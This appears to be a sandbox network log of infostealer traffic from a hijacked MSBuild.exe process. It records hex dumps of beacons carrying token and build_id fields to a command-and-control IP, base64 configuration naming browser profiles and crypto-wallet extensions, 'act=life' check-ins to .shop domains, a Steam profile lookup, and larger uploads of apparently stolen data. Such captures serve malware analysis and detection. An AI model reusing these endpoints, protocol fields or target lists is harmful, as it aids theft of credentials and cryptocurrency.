2024-08-10 14:12:52 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=016vgmn035ra0k6v8cuskig4h4; expires=Wed, 04-Dec-2024 07:59:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNFPPTgBT%2Bxz2%2FrtYIsZvZQpycNdBc8mTl3BjE1mGYENe9BoIRh0FCCfB70YQ3Jdk9LBdEHOmQoR%2F7jCEQM4YVaMewrrrWANHd98OPW7swCK2J9frgQwS9biHLoo1FyZOjhxMJGzAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b1095546b838cee-EWR alt-svc: h3=":443"; ma=86400
2024-08-10 14:12:52 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-10 14:12:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49776	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:53 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:12:53 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------FIEHIIIJDAAAAAAKECBFContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------FIEHIIIJDAAAAAAKECBFContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------FIEHIIIJDAAAAAAKECBFCont
2024-08-10 14:12:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:12:53 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49778	188.114.97.3	443	2188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:54 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: quialitsuzoxm.shop
2024-08-10 14:12:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-10 14:12:54 UTC	804	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h1qmahfdfig13bqd7gfgc9hm3u; expires=Wed, 04-Dec-2024 07:59:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2V0SKKmatyp8sCNE4wGG7j73qbMeBUfZM%2BY7sOi03WYZBctmdfSYn9L8VfoQFQzBWkbtQortn%2FUin1K6hjhGW4ui%2B67frmFNCR2eRMsG8wg%2Fdyd6bFEWFLCRAo5KWJo3fYP4Eag%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b10955eeaea4288-EWR alt-svc: h3=":443"; ma=86400
2024-08-10 14:12:54 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-10 14:12:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49779	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:54 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:12:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------IECBAFCAAKJDHJKFIEBGCont
2024-08-10 14:12:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:12:55 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49781	92.122.104.90	443	2188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:55 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-08-10 14:12:56 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 10 Aug 2024 14:12:56 GMT Content-Length: 34678 Connection: close Set-Cookie: sessionid=4ce78a0b65c247c184667835; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-08-10 14:12:56 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-08-10 14:12:56 UTC	10062	IN	Data Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
2024-08-10 14:12:56 UTC	10102	IN	Data Raw: 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 Data Ascii: t;,"COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARED_URL":"https:\/\/communit

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49782	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:56 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:12:56 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------FCAAAAFBKFIECAAKECGCContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------FCAAAAFBKFIECAAKECGCContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------FCAAAAFBKFIECAAKECGCCont
2024-08-10 14:12:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:12:56 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49783	188.114.96.3	443	2188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:57 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tenntysjuxmz.shop
2024-08-10 14:12:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-10 14:12:57 UTC	804	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m32hv3aokjcjmffea70cmc7p8t; expires=Wed, 04-Dec-2024 07:59:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nRcciEKvcQRkZ5886gWuadpgCS4HZs61rS%2FGDjic5Loas5LeRCI2vio2Z0LOCbAOcXoh6JXbP0ZkwzLjWFKzW%2FM6xLxuXfupSloPzTp48UhUblR%2Faf8fleXijmiRbYOHkTWLoQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b1095717d4e8cad-EWR alt-svc: h3=":443"; ma=86400
2024-08-10 14:12:57 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-10 14:12:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49784	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:59 UTC	306	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 6509 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:12:59 UTC	6509	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------JDAFHCGIJECFHIDGDBKECont
2024-08-10 14:13:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:00 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49785	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:13:00 UTC	306	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:13:00 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------JEBFIIIEHCFHJKFHDHDACont
2024-08-10 14:13:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49788	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:13:01 UTC	306	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJEC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:13:01 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 